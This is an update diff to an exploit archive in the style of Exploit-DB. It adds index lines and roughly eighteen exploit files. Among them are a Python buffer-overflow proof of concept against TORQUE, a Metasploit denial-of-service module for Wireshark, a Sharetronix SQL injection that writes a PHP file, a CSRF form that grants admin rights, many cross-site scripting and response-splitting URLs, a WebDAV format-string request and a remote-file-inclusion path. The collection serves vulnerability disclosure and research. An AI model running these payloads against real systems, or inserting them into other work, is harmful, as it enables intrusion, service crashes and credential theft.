Updated 05_30_2014

files.csv

@@ -6985,7 +6985,7 @@ id,file,description,date,author,platform,type,port
 7441,platforms/php/webapps/7441.txt,"joomla live chat (sql/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0
 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0
 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0
-7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
+7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0
@@ -30223,3 +30223,20 @@ id,file,description,date,author,platform,type,port
 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
 33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
 33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0
+33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0
+33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (msf)",2014-05-28,j0sm1,multiple,dos,5247
+33557,platforms/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80
+33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 'failurl' Parameter HTTP Response Splitting Vulnerability",2010-01-21,Trancer,php,webapps,0
+33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server  7.0 Update 6 'admin' Server Denial of Service Vulnerability",2010-01-22,Intevydis,multiple,dos,0
+33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 WebDAV Format String Vulnerability",2010-01-22,Intevydis,multiple,dos,0
+33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 SQL Injection Vulnerability",2010-01-22,AndySoon,php,webapps,0
+33562,platforms/multiple/remote/33562.html,"Google Chrome 3.0 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-22,"Cesar Cerrudo",multiple,remote,0
+33563,platforms/windows/remote/33563.txt,"Apple Safari 4.0.4 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",windows,remote,0
+33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0
+33565,platforms/php/webapps/33565.txt,"PunBB 1.3 'viewtopic.php' Cross-Site Scripting Vulnerability",2010-01-24,s4r4d0,php,webapps,0
+33566,platforms/php/webapps/33566.txt,"Joomla! 3D Cloud 'tagcloud.swf' Cross-Site Scripting Vulnerability",2010-01-26,MustLive,php,webapps,0
+33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x 'translation' Cross Site Scripting Vulnerability",2010-01-26,"Matias Pablo Brutti",hardware,remote,0
+33568,platforms/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 Password Information Disclosure Vulnerability",2010-01-17,"Alejandro Ramos",hardware,remote,0
+33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage <= 3.0.2 'servercert' Parameter Cross Site Scripting Vulnerability",2010-01-27,"Richard Brain",multiple,remote,0
+33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 URI Redirection and Cross Site Scripting Vulnerabilities",2010-01-27,"Richard Brain",multiple,remote,0
+33571,platforms/linux/dos/33571.txt,"PostgreSQL 'bitsubstr' Buffer Overflow Vulnerability",2010-01-27,Intevydis,linux,dos,0

platforms/hardware/remote/33567.txt

@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/37960/info
+
+Cisco Secure Desktop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Cisco Secure Desktop 3.5 are vulnerable. 
+
+REQUEST:
+POST https://www.example.com/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1 
+Host: www.example.com 
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
+Keep-Alive: 300 
+Connection: keep-alive 
+Referer: https://www.example.com/CACHE/sdesktop/install/start.htm 
+Content-Type: application/xml; charset=UTF-8 
+Cookie: webvpnLang=en-us; webvpnlogin=1
+Pragma: no-cache 
+Cache-Control: no-cache 
+Content-Length: 56
+
+Starting, please wait..."><script>alert(1);</script>
+
+RESPONSE:
+HTTP/1.1 200 OK 
+Server: Cisco AWARE 2.0 
+Content-Type: text/html; charset=UTF-8 
+Cache-Control: no-cache 
+Pragma: no-cache 
+Connection: Keep-Alive 
+Date: Mon, 16 Nov 2009 14:14:07 GMT
+Content-Length: 122
+
+trans["Starting, please wait...\"><script>alert(1);</script>"] = "Starting, please wait...\"><script>alert(1);</script>";

platforms/hardware/remote/33568.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/37962/info
+
+MiFi 2352 is prone to an information-disclosure vulnerability that may expose sensitive information.
+
+Successful exploits will allow authenticated attackers to obtain passwords, which may aid in further attacks.
+
+MiFi 2352 access point firmware 11.47.17 is vulnerable; other versions may also be affected. 
+
+The following example URIs are available:
+
+http://www.example.com/config.xml.sav
+http://www.example.com/config.xml.save 

platforms/jsp/webapps/33564.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37927/info
+
+Jetty is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/jspsnoop/ERROR/%3Cscript%3Ealert(123)%3C/script%3E
+http://www.example.com/jspsnoop/IOException/%3Cscript%3Ealert(123)%3C/script%3E
+http://www.example.com/jspsnoop/%3Cscript%3Ealert(123)%3C/script%3E
+

platforms/linux/dos/33571.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37973/info
+
+PostgreSQL is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.
+
+PostgreSQL 8.0.23 is vulnerable; other versions may also be affected.
+
+
+testdb=# select substring(B'101010101010101010101010101010101010
+10101010101',33,-15); 

platforms/linux/remote/33554.py

@@ -0,0 +1,38 @@
+#!/usr/bin/env python
+# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub
+# Date: 27 May 2014
+# Exploit Author: bwall - @botnet_hunter
+# Vulnerability discovered by: MWR Labs
+# CVE: CVE-2014-0749
+# Vendor Homepage: http://www.adaptivecomputing.com/
+# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
+# Version: 2.5.13
+# Tested on: Manjaro x64
+# Description:
+# A buffer overflow while parsing the DIS network communication protocol.  It is triggered when requesting that
+# a larger amount of data than the small buffer be read.  The first digit supplied is the number of digits in the
+# data, the next digits are the actual size of the buffer.
+#
+# This is an exploit stub, meant to be a quick proof of concept.  This was built and tested for a 64 bit system
+# with ASLR disabled.  Since Adaptive Computing does not supply binary distributions, TORQUE will likely be
+# compiled on the target system.  The result of this exploit is intended to just point RIP at 'exit()'
+
+import socket
+
+
+ip = "172.16.246.177"
+port = 15001
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((ip, port))
+
+offset = 143
+header = str(len(str(offset))) + str(offset) + '1'
+
+packet = header
+packet += "\x00" * (140 - len(packet))
+packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build
+
+s.sendall(packet)
+data = s.recv(1024)
+s.close()

platforms/multiple/dos/33556.rb

@@ -0,0 +1,55 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wireshark CAPWAP Dissector DoS',
+      'Description'    => %q{
+        This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0
+        to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an
+        incomplete packet.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Laurent Butti', # Discovery vulnerability
+          'j0sm1'  # Auxiliary msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2013-4074'],
+          ['OSVDB', '94091'],
+          ['BID', '60500']
+        ],
+      'DisclosureDate' => 'Apr 28 2014'))
+
+    # Protocol capwap needs port 5247 to trigger the dissector in wireshark
+    register_options([ Opt::RPORT(5247) ], self.class)
+  end
+
+  def run
+
+    connect_udp
+
+    # We send a packet incomplete to crash dissector
+    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
+    # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
+    # the dissector crash
+    # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
+    # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
+    buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
+    udp_sock.put(buf)
+
+    disconnect_udp
+
+  end
+end

platforms/multiple/dos/33559.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37909/info
+
+Sun Java System Web Server is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the effected application, denying service to legitimate users.
+
+Sun Java System Web Server 7.0 Update 6 is affected; other versions may also be vulnerable. 
+
+The following example request is available:
+
+" / HTTP/1.0\n\n" 

platforms/multiple/dos/33560.txt

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/37910/info
+
+Sun Java System Web Server is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. The issue affects the WebDAV functionality.
+
+Currently very few technical details are available. We will update this BID as more information emerges.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+The issues affects the following:
+
+Sun Java System Web Server 7.0 without Update Release 8
+Sun Java System Web Server 6.1 without Service Pack 12 
+
+s="PROPFIND /pages/ HTTP/1.1\n" # WebDAV URI
+s+="Host: localhost\n"
+s+="Depth: 0\n"
+s+="Content-Length: 58\n"
+s+="Content-Type: application/xml\n\n"
+s+="<?xml version=\"1.0\" encoding=\"utf-%n%n%n%n%n%n%n%n%n%n\"?>" 

platforms/multiple/remote/33562.html

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37917/info
+
+Google Chrome is prone to a remote information-disclosure vulnerability.
+
+Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks. 
+
+<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>

platforms/multiple/remote/33569.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37968/info
+
+HP System Management Homepage, also known as Systems Insight Manager, is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. 
+
+http://www.example.com/proxy/smhui/getuiinfo?JS&servercert=%0064e43<script>alert(1)</script>7b3f58a689f

platforms/multiple/remote/33570.txt

@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/37972/info
+
+SAP BusinessObjects is prone to multiple URI-redirection issues and multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary script or HTML code, steal cookie-based authentication credentials, and conduct phishing attacks. Other attacks may also be possible. 
+
+http://www.example.com:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1&sectionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
+http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
+http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
+http://www.example.com:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
+http://www.example.com:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=?></script><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=?><script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
+http://www.example.com:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
+http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
+http://www.example.com:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
+http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=1&uid=1&variance=1&viewed=1&
+http://www.example.com:6405//PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&progtrend=1&progtrendImage=1&viewed=1&
+http://www.example.com:8080/PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>
+http://www.example.com:6405//PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-
+http://www.example.com:8080/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:6405/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com:8080/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
+http://www.example.com:6405/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
+http://www.example.com:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=<SCRIPT>alert(1)</SCRIPT>&actId=541&appKind=CMC

platforms/php/webapps/33557.txt

@@ -0,0 +1,75 @@
+Advisory ID: HTB23214
+Product: Sharetronix
+Vendor: Blogtronix, LLC
+Vulnerable Version(s): 3.3 and probably prior
+Tested Version: 3.3
+Advisory Publication: May 7, 2014 [without technical details]
+Vendor Notification: May 7, 2014 
+Vendor Patch: May 27, 2014 
+Public Disclosure: May 28, 2014 
+Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
+CVE References: CVE-2014-3414, CVE-2014-3415
+Risk Level: High 
+CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+------------------------------------------------------------------------
+-----------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Sharetronix, which can be exploited to perform SQL injection and Сross-Site Request Forgery (CSRF) attacks against vulnerable application. A remote hacker can gain full control over the application.
+
+1) SQL Injection in Sharetronix: CVE-2014-3415
+
+Input passed via the "invite_users[]" HTTP POST parameter to "/[group_name]/invite" URI is not properly sanitised before being used in SQL query. A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL commands in application's database.
+
+The following exploit code below creates a file "file.php" within the home directory of MySQL server with output of the "phpinfo()" PHP function in:
+
+<form action="http://[host]/[group_name]/invite" method="post" name="main">
+<input type="hidden" name="invite_users[]" value='0" UNION SELECT "<? phpinfo(); ?>",2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 INTO OUTFILE "file.php" -- '>
+<input type="submit" id="btn">
+</form>
+
+The attacker must be registered and logged-in (the registration is open by default). The attacker also must initially create a group (action allowed by default), in our example the group name is "group_name".
+
+2) Сross-Site Request Forgery (CSRF) in Sharetronix: CVE-2014-3414
+
+The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to open a web page with CSRF exploit and grant administrative privileges to arbitrary existing user of the vulnerable application. The registration is open by default.
+
+The following CSRF exploit below grants administrative privileges to the user "username":
+
+<form action="http://[host]/admin/administrators" method="post" name="main">
+<input type="hidden" name="admin" value="username">
+<input type="submit" id="btn">
+</form>
+<script>
+document.main.submit();
+</script>
+
+------------------------------------------------------------------------
+-----------------------
+
+Solution:
+
+Update to Sharetronix 3.4
+
+More Information:
+http://developer.sharetronix.com/download
+
+------------------------------------------------------------------------
+-----------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23214 - https://www.htbridge.com/advisory/HTB23214 - Multiple vulnerabilities in Sharetronix.
+[2] Sharetronix - http://sharetronix.com/ - Sharetronix is a Secure Social Network for Your Company.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+------------------------------------------------------------------------
+-----------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

platforms/php/webapps/33558.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/37902/info
+
+cPanel and WHM is prone to an HTTP response-splitting vulnerability.
+
+Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
+
+cPanel 11.25 and WHM 11.25 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/login/?user=foo&pass=bar&failurl=%0D%0ASet-Cookie%3A%20Rec=Sec
+http://www.example.com/login/?user=foo&pass=bar&failurl=%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Ealert%28%22Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/script%3E%3C!--
+http://www.example.com/login/?user=foo&pass=bar&failurl=http://www.rec-sec.com

platforms/php/webapps/33561.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/37913/info
+
+OpenX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+OpenX 2.6.1 is vulnerable; other versions may also be affected. 
+
+
+http://www.example.com/index.php?q=shopping/neighborhood/45+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 

platforms/php/webapps/33565.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37930/info
+
+PunBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PunBB 1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forum/viewtopic.php?pid=[Xss] 

platforms/php/webapps/33566.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/37958/info
+
+The 3D Cloud component for Joomla! is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E
+%3C/tags%3E

platforms/php/webapps/7444.txt

@@ -1,69 +1,69 @@
-[START]
-
-#########################################################################################
-[0x01] Informations:
-
-Script         : Simple Text-File Login script 1.0.6
-Download       : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type=1
-Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
-Author         : Osirys
-Contact        : osirys[at]live[dot]it
-Notes          : Proud to be Italian
-Greets:        : XaDoS, x0r, emgent, Jay
-Notes          : *
-
-* The name of this login system is Simple Text-File Login script, so we can already 
-  understand that this script will use a .txt file to do his job. So it's like if
-  the coder didn't think that a login system like this isn't vulnerable. Weird !
-  Anyway, it's vulnerable to Remote File Inclusion also, here we are !
-
-#########################################################################################
-[0x02] Bug:[Remote File Inclusion]
-######
-
-Bugged file is: /[path]/slogin_lib.inc.php
-
-[CODE]
-90.  if (!isset ($slogin_path)) {
-91.    $slogin_path = "";
-92. }
-[/CODE]
-
-If $slogin_path is not given, becomes a null variable. Scrolling down the source code,
-you can see an include of that variable everywhere.
-Just one of the few vulnerable includes:
-
-[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]
-
-FIX: Just declare $slogin_path. An example of a bugged inclusion in the source is this:
-
-[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]
-
-The header.inc.php file, such as all the files of this cms, is in the same dir of
-slogin_lib.inc.php, so a fix could be just to include the file, without including
-a variable, which should be null becouse all the files are in the same dir.
-
-[CODE] include_once ("header.inc.php"); # <-- This is a secure include. [/CODE]
-
-
-[!] EXPLOIT: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
-
-########################################################################################
-[0x03] Bug:[Sensitive Data Disclosure]
-######
-
-* As I already said, this is not a real bug, becouse is the intention of the author
-  to use a .txt file as a login storage. But it's weird, it's unsecure ! Maybe he just 
-  sees the goodness of people (hehe xD)
-
-In this login system, sensible datas like username and password are stored in a local
-text file , so we can get sensitive information just going to this txt file . The name of
-this file is set in slogin_lib.inc.php. By default is: slog_users.txt
-
-[!] EXPLOIT: /[path]/slog_users.txt
-
-#########################################################################################
-
-[/END]
-
-# milw0rm.com [2008-12-14]
+[START]
+
+#########################################################################################
+[0x01] Informations:
+
+Script         : Simple Text-File Login script 1.0.6
+Download       : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type=1
+Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
+Author         : Osirys
+Contact        : osirys[at]live[dot]it
+Notes          : Proud to be Italian
+Greets:        : XaDoS, x0r, emgent, Jay
+Notes          : *
+
+* The name of this login system is Simple Text-File Login script, so we can already 
+  understand that this script will use a .txt file to do his job. So it's like if
+  the coder didn't think that a login system like this isn't vulnerable. Weird !
+  Anyway, it's vulnerable to Remote File Inclusion also, here we are !
+
+#########################################################################################
+[0x02] Bug:[Remote File Inclusion]
+######
+
+Bugged file is: /[path]/slogin_lib.inc.php
+
+[CODE]
+90.  if (!isset ($slogin_path)) {
+91.    $slogin_path = "";
+92. }
+[/CODE]
+
+If $slogin_path is not given, becomes a null variable. Scrolling down the source code,
+you can see an include of that variable everywhere.
+Just one of the few vulnerable includes:
+
+[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]
+
+FIX: Just declare $slogin_path. An example of a bugged inclusion in the source is this:
+
+[CODE] include_once ($slogin_path . "header.inc.php"); [/CODE]
+
+The header.inc.php file, such as all the files of this cms, is in the same dir of
+slogin_lib.inc.php, so a fix could be just to include the file, without including
+a variable, which should be null becouse all the files are in the same dir.
+
+[CODE] include_once ("header.inc.php"); # <-- This is a secure include. [/CODE]
+
+
+[!] EXPLOIT: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
+
+########################################################################################
+[0x03] Bug:[Sensitive Data Disclosure]
+######
+
+* As I already said, this is not a real bug, becouse is the intention of the author
+  to use a .txt file as a login storage. But it's weird, it's unsecure ! Maybe he just 
+  sees the goodness of people (hehe xD)
+
+In this login system, sensible datas like username and password are stored in a local
+text file , so we can get sensitive information just going to this txt file . The name of
+this file is set in slogin_lib.inc.php. By default is: slog_users.txt
+
+[!] EXPLOIT: /[path]/slog_users.txt
+
+#########################################################################################
+
+[/END]
+
+# milw0rm.com [2008-12-14]

platforms/windows/remote/33563.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37925/info
+
+Apple Safari is prone to a remote information-disclosure vulnerability.
+
+Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.
+
+<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>